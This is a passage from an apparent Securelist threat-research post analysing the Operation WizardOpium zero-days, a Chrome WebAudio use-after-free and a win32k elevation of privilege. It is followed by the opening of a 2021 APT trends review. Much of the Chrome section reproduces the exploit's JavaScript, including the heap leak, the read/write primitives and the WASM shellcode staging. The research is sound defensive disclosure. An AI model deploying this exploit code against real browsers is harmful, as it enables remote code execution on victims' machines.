= (addr & superPageOffsetMask) >> BigInt(14);\n \treturn partitionPageIndex;\n }\n \n function getMetadataAreaBaseFromPartitionSuperPage(addr) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet systemPageSize = BigInt(0x1000);\n \treturn superPageBase + systemPageSize;\n }\n \n function getPartitionPageMetadataArea(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \tlet pageMetadataSize = BigInt(0x20);\n 
\tlet partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;\n \treturn partitionPageMetadataPtr;\n }\n\nIt's interesting that the exploit also uses the relatively new built-in [BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.\n\nAt first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.\n \n \n let gcPreventer = [];\n let iirFilters = [];\n \n function initialSetup() {\n \tlet audioCtx = new OfflineAudioContext(1, 20, 3000);\n \n \tlet feedForward = new Float64Array(2);\n \tlet feedback = new Float64Array(1);\n \n \tfeedback[0] = 1;\n \tfeedForward[0] = 0;\n \tfeedForward[1] = -1;\n \n \tfor (let i = 0; i < 256; i++)\n iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));\n }\n\nAfter that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. 
It creates another huge OfflineAudioContext object and two ConvolverNode objects \u2013 ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.\n \n \n async function triggerUaF(doneCb) {\n \tlet audioCtx = new OfflineAudioContext(2, 0x400000, 48000);\n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \tlet scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);\n \tlet channelBuffer = audioCtx.createBuffer(1, 1, 48000);\n \n \tconvolver.buffer = channelBuffer;\n \tbufferSource.buffer = channelBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tchannelBuffer.getChannelData(0).fill(0);\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(scriptNode);\n \tscriptNode.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \tscriptNode.onaudioprocess = function(evt) {\n \t\tlet channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);\n \n \t\tfor (let j = 0; j < channelDataArray.length; j++) {\n \t\tif (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {\n \t\t\tlet u64Array = new BigUint64Array(1);\n \t\t\tlet u32Array = new Uint32Array(u64Array.buffer);\n \t\t\tu32Array[0] = channelDataArray[j + 0];\n \t\t\tu32Array[1] = channelDataArray[j + 1];\n \n \t\t\tlet leakedAddr = byteSwapBigInt(u64Array[0]);\n \t\t\tif (leakedAddr >> BigInt(32) > BigInt(0x8000))\n \t\t\tleakedAddr -= BigInt(0x800000000000);\n \t\t\tlet superPageBase = getSuperPageBase(leakedAddr);\n \n \t \t\tif (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {\n \t\t\tfinished = true;\n \t\t\tevt = null;\n \n \t\t\tbufferSource.disconnect();\n \t\t\tscriptNode.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\tsetTimeout(function() {\n \t\t\tdoneCb(leakedAddr);\n \t\t\t}, 1);\n \n \t\t\treturn;\n \t\t\t}\n \t\t}\n 
\t\t}\n \t};\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (!finished) {\n \t \tfinished = true;\n \t \ttriggerUaF(doneCb);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tconvolver.buffer = null;\n \t\tconvolver.buffer = channelBuffer;\n \t\tawait later(100); // wait 100 millseconds\n \t}\n };\n\nThis function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:\n \n \n function later(delay) {\n \treturn new Promise(resolve => setTimeout(resolve, delay));\n }\n\nDuring execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.\n\nThe PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:\n \n \n function byteSwapBigInt(x) {\n \tlet result = BigInt(0);\n \tlet tmp = x;\n \n \tfor (let i = 0; i < 8; i++) {\n \t\tresult = result << BigInt(8);\n \t\tresult += tmp & BigInt(0xFF);\n \t\ttmp = tmp >> BigInt(8);\n \t}\n \n \treturn result;\n }\n\nThe exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. 
If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function _initialUAFCallback_.\n \n \n let sharedAudioCtx;\n let iirFilterFeedforwardAllocationPtr;\n \n function initialUAFCallback(addr) {\n \tsharedAudioCtx = new OfflineAudioContext(1, 1, 3000);\n \n \tlet partitionPageIndexDelta = undefined;\n \tswitch (majorVersion) {\n \t\tcase 77: // 77.0.3865.75\n \t \tpartitionPageIndexDelta = BigInt(-26);\n \tbreak;\n \t\tcase 76: // 76.0.3809.87\n \t\tpartitionPageIndexDelta = BigInt(-25);\n \t \tbreak;\n \t}\n \n \tiirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);\n \n triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);\n }\n\nThe exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray<double> type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.\n\nThe vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. 
This function also executes recursively.\n \n \n let floatArray = new Float32Array(10);\n let audioBufferArray1 = [];\n let audioBufferArray2 = [];\n let imageDataArray = [];\n \n async function triggerSecondUAF(addr, doneCb) {\n \tlet counter = 0;\n \tlet numChannels = 1;\n \n \tlet audioCtx = new OfflineAudioContext(1, 0x100000, 48000);\n \n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \n \tlet bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);\n \tlet smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);\n \n \tsmallAudioBuffer.getChannelData(0).fill(0);\n \n \tfor (let i = 0; i < numChannels; i++) {\n \t\tlet channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);\n \t\tchannelDataArray[0] = addr;\n \t}\n \n \tbufferSource.buffer = bigAudioBuffer;\n \tconvolver.buffer = smallAudioBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (finished) {\n \t\taudioCtx = null;\n \n \t\tsetTimeout(doneCb, 200);\n \t\treturn;\n \t\t} else {\n \t\tfinished = true;\n \n \t\tsetTimeout(function() {\n \t\ttriggerSecondUAF(addr, doneCb);\n \t\t}, 1);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tcounter++;\n \n \t\tconvolver.buffer = null;\n \n \t\tawait later(1); // wait 1 millisecond\n \n \t\tif (finished)\n \t\tbreak;\n \n \t\tfor (let i = 0; i < iirFilters.length; i++) {\n \t\tfloatArray.fill(0);\n \t iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\t\tfinished = true;\n \n \t \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n 
\n \t\t\tbufferSource.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\treturn;\n \t\t}\n \t\t}\n \n \t\tconvolver.buffer = smallAudioBuffer;\n \n \t\tawait later(1); // wait 1 millisecond\n \t}\n }\n\nThis time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.\n \n \n void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,\n \tconst float* frequency_hz,\n \tfloat* mag_response,\n \tfloat* phase_response) {\n ...\n Vector<float> frequency(n_frequencies);\n double nyquist = this->Nyquist();\n // Convert from frequency in Hz to normalized frequency (0 -> 1),\n // with 1 equal to the Nyquist frequency.\n for (int k = 0; k < n_frequencies; ++k)\n \tfrequency[k] = frequency_hz[k] / nyquist;\n ...\n\nIf the resulting array contains a value other than **\u03c0**, it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. 
The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.\n \n \n async function finalUAFCallback() {\n \tfor (let i = 0; i < 256; i++) {\n \t\tfloatArray.fill(0);\n \n \tiirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\tawait collectGargabe();\n \n \t\taudioBufferArray2 = [];\n \n \t\tfor (let j = 0; j < 80; j++)\n \t\taudioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));\n \n \t\tiirFilters = new Array(1);\n \t \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < 336; j++)\n \t\t\timageDataArray.push(new ImageData(1, 2));\n \t\timageDataArray = new Array(10);\n \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < audioBufferArray1.length; j++) {\n \t\t\tlet auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);\n \t\t\tif (auxArray[0] != BigInt(0)) {\n \t\t\tkickPayload(auxArray);\n \t\t\treturn;\n \t\t\t}\n \t\t}\n \n \t\treturn;\n \t\t}\n \t}\n }\n\nHeap defragmentation is performed with multiple calls to the improvised _collectGarbage_ function that creates a huge ArrayBuffer in a loop.\n \n \n function collectGargabe() {\n \tlet promise = new Promise(function(cb) {\n \t\tlet arg;\n \t\tfor (let i = 0; i < 400; i++)\n \t\tnew ArrayBuffer(1024 * 1024 * 60).buffer;\n \t\tcb(arg);\n \t});\n \treturn promise;\n }\n\nAfter those steps, the exploit executes the function _kickPayload()_ passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.\n \n \n async function kickPayload(auxArray) {\n \tlet audioCtx = new OfflineAudioContext(1, 1, 3000);\n \tlet partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));\n \tauxArray[0] = byteSwapBigInt(partitionPagePtr);\n \tlet i = 0;\n \tdo {\n \t\tgcPreventer.push(new ArrayBuffer(8));\n \t\tif (++i > 0x100000)\n \t\treturn;\n \t} while (auxArray[0] != BigInt(0));\n \tlet 
freelist = new BigUint64Array(new ArrayBuffer(8));\n \tgcPreventer.push(freelist);\n \t...\n\nThe exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.\n \n \n function read64(rwHelper, addr) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array;\n \ttmp.buffer;\n \tgcPreventer.push(tmp);\n \treturn byteSwapBigInt(rwHelper[0]);\n }\n \n function write64(rwHelper, addr, value) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array(1);\n \ttmp.buffer;\n \ttmp[0] = value;\n \tgcPreventer.push(tmp);\n }\n\nAfter the building of the arbitrary read/write primitives comes the final stage \u2013 executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a \"dummy\" WASM module and it results in the allocation of memory pages for JIT compiled code.\n \n \n const wasmBuffer = new Uint8Array([...]);\n const wasmBlob = new Blob([wasmBuffer], {\n \ttype: \"application/wasm\"\n });\n \n const wasmUrl = URL.createObjectURL(wasmBlob);\n var wasmFuncA = undefined;\n WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {\n \twasmFuncA = result.instance.exports.a;\n });\n\nTo execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. 
If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.\n \n \n let fileReader = new FileReader;\n let fileReaderLoaderSize = 0x140;\n let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (!fileReaderLoaderPtr)\n \treturn;\n \n fileReader.readAsArrayBuffer(new Blob([]));\n \n let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)\n \treturn;\n\nThe exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. 
The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.\n \n \n fileReader.onerror = wasmFuncA;\n \n let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n \n let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));\n let registeredEventListenerPtr = read64(freelist, vectorPtr);\n let eventListenerPtr = read64(freelist, registeredEventListenerPtr);\n let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));\n let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));\n \n let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);\n let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);\n let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);\n \n let stubAddrFieldOffset = undefined;\n switch (majorVersion) {\n \tcase 77:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n \tbreak;\n \tcase 76:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n \tbreak\n }\n \n let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);\n\nThe variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. 
This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. 
On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of a bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities, and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>). This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k, Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of the tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. 
Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) where pre-initialized extra data can lead to system procedures handling it incorrectly. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nThe check on the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) & 0x1F. The exploit uses a dwType equal to 0xE0. 
It results in an fnIndex equal to 6 which is the function index of _xxxSwitchWndProc_ and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.\n \n \n LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)\n {\n ...\n pti = *(tagTHREADINFO **)&gptiCurrent;\n if ( wnd->fnid != FNID_SWITCH )\n {\n if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )\n return 0i64;\n if ( msg != 1 )\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n if ( wnd[1].head.h )\n return 0i64;\n wnd->fnid = FNID_SWITCH;\n }\n switch ( msg )\n {\n case WM_CREATE:\n zzzSetCursor(wnd->pcls->spcur, pti, 0i64);\n break;\n case WM_CLOSE:\n xxxSetWindowPos(wnd, 0, 0);\n xxxCancelCoolSwitch();\n break;\n case WM_ERASEBKGND:\n case WM_FULLSCREEN:\n pti->ptl = (_TL *)&pti->ptl;\n ++wnd->head.cLockObj;\n xxxPaintSwitchWindow(wnd, pti, 0i64);\n ThreadUnlock1();\n return 0i64;\n }\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n }\n\nThe vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.\n\nAt this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_ that increments and decrements a couple of integers located at the pointer that we previously set.\n \n \n sub [rdi+60h], ebx\n add [rdi+68h], ebx\n ...\n sub [rdi+5Ch], ecx\n add [rdi+64h], ecx\n\nAn important condition for triggering the exploitable code path is that the ALT key needs to be pressed.\n\nExploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. 
To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating a Create Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.\n\nThe whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares Switch Window and uses a vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.\n\nThe pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). 
The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses an executable in search for the exported PsInitialSystemProcess variable.\n\nIt's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.\n\n## Conclusions\n\nIt was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.\n\n_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. 
The reward was donated to charity and Google matched the donation._", "cvss3": {}, "published": "2020-05-28T10:00:09", "type": "securelist", "title": "The zero-day exploits of Operation WizardOpium", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2010-2744", "CVE-2016-7255", "CVE-2019-0859", "CVE-2019-13720", "CVE-2019-1458"], "modified": "2020-05-28T10:00:09", "id": "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "href": "https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-30T10:36:53", "description": "\n\nIn the Global Research and Analysis Team at Kaspersky, we track the ongoing activities of more than 900 advanced threat actors and activity clusters; you can find our quarterly overviews [here](<https://securelist.com/apt-trends-report-q1-2021/101967/>), [here](<https://securelist.com/apt-trends-report-q2-2021/103517/>) and [here](<https://securelist.com/apt-trends-report-q3-2021/104708/>)[.](<https://securelist.com/apt-trends-report-q3-2021/104708/>) For this annual review, we have tried to focus on what we consider to be the most interesting trends and developments of the last 12 months. This is based on our visibility in the threat landscape and it's important to note that no single vendor has complete visibility into the activities of all threat actors.\n\n## Private sector vendors play a significant role in the threat landscape\n\nPossibly the biggest story of 2021, an investigation by the Guardian and 16 other media organizations, published in July, suggested that over 30,000 human rights activists, journalists and lawyers across the world may have been targeted using Pegasus. The report, called [Pegasus Project](<https://www.amnesty.org/en/latest/press-release/2021/07/the-pegasus-project/>), alleged that the software uses a variety of exploits, including several iOS zero-click zero-days. 
Based on forensic analysis of numerous mobile devices, Amnesty International's Security Lab found that the software was repeatedly used in an abusive manner for surveillance. The list of targeted individuals includes 14 world leaders. Later that month, [representatives from the Israeli government visited the offices of NSO](<https://www.theguardian.com/news/2021/jul/29/israeli-authorities-inspect-nso-group-offices-after-pegasus-revelations>) as part of an investigation into the claims. And in October, India's Supreme Court commissioned a technical committee [to investigate whether the government had used Pegasus to spy on its citizens](<https://www.theregister.com/2021/10/29/india_nso_pegasus_probe/>). In November, Apple announced that it was taking [legal action against NSO Group](<https://www.theguardian.com/technology/2021/nov/23/apple-sues-israeli-cyber-firm-nso-group>) for developing software that targets its users with "malicious malware and spyware".\n\nDetecting infection traces from Pegasus and other advanced mobile malware is very tricky, and complicated by the security features of modern OSs such as iOS and Android. Based on our observations, this is further complicated by the deployment of non-persistent malware, which leaves almost no traces after reboot. Since many forensics frameworks require a device jailbreak, this results in the malware being removed from memory during the reboot. Currently, several methods can be used for detection of Pegasus and other mobile malware. [MVT (Mobile Verification Toolkit](<https://github.com/mvt-project/mvt>)) from Amnesty International is free, open source and allows technologists and investigators to inspect mobile phones for signs of infection. MVT is further boosted by a list of IoCs (indicators of compromise) collected from high profile cases and made available by Amnesty International.\n\n## Supply-chain attacks\n\nThere have been a number of high-profile supply-chain attacks in the last 12 months. 
Last December, it was reported that SolarWinds, a well-known IT managed services provider, had fallen victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised. This resulted in the deployment of a custom backdoor named Sunburst on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nNot all supply-chain attacks have been that sophisticated. Early this year, an APT group that we track as BountyGlad compromised a certificate authority in Mongolia and replaced the digital certificate management client software with a malicious downloader. Related infrastructure was identified and used in multiple other incidents: this included server-side attacks on WebSphere and WebLogic services in Hong Kong, and Trojanized Flash Player installers on the client side.\n\nWhile investigating the artefacts of a supply-chain attack on an Asian government Certification Authority's website, we discovered a Trojanized package that dates back to June 2020. Unravelling that thread, we identified a number of post-compromise tools in the form of plugins that were deployed using PhantomNet malware, which were in turn delivered using the aforementioned Trojanized packages. Our analysis of these plugins revealed similarities with the previously analyzed CoughingDown malware.\n\nIn April 2021, Codecov, provider of code coverage solutions, publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between January 31 and April 1. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports and send the results to the Codecov infrastructure. 
